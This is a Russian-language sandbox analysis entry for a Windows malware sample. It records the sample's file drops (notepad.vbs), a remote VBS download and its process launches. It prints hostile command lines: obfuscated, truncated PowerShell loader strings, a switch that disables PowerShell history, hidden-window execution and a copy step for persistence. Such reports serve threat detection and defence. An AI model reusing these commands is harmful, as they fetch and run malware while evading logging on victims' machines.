Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gh47gh7='92%72%37%26%67%E2%46%16%07%56%47%F6%E6%C5%72%02%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%82%37%37%56%36%F6%27%07%D2%47%27%16%47%37%02%B3%85%06%54%06%94%C7%72%92%72%72%37%26%67%E2%46%16%...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\notepad.vbs
- %LOCALAPPDATA%\notepad.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://av#####amotorhome.com/wprl/home/Protected.vbs
UDP
- DNS ASK av#####amotorhome.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\notepad.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gh47gh7='92%72%37%26%67%E2%46%16%07%56%47%F6%E6%C5%72%02%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%82%37%37%56%36%F6%27%07%D2%47%27%16%47%37%02%B3%85%06%54%06%94%C7%72%92%72%72%37%26%67%E2%46%16%...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-PSReadlineOption -HistorySaveStyle SaveNothing;$JqmGSYFdciEMkrojOGsg='Q4*QF*20*7B*24*70*Q9*QE*Q7*20*3D*20*74*QO*73*74*2D*Q3*QF*QE*QE*QO*Q3*74*Q9*QF*QE*20*2D*Q3*QF*QD*70*20*Q7*QF*QF*Q7*QC*QO...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "%APPDATA%\notepad.vbs" "%LOCALAPPDATA%" /Y' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-PSReadlineOption -HistorySaveStyle SaveNothing;$JqmGSYFdciEMkrojOGsg='Q4*QF*20*7B*24*70*Q9*QE*Q7*20*3D*20*74*QO*73*74*2D*Q3*QF*QE*QE*QO*Q3*74*Q9*QF*QE*20*2D*Q3*QF*QD*70*20*Q7*QF*QF*Q7*QC*QO...
- '<SYSTEM32>\cmd.exe' /c copy "%APPDATA%\notepad.vbs" "%LOCALAPPDATA%" /Y
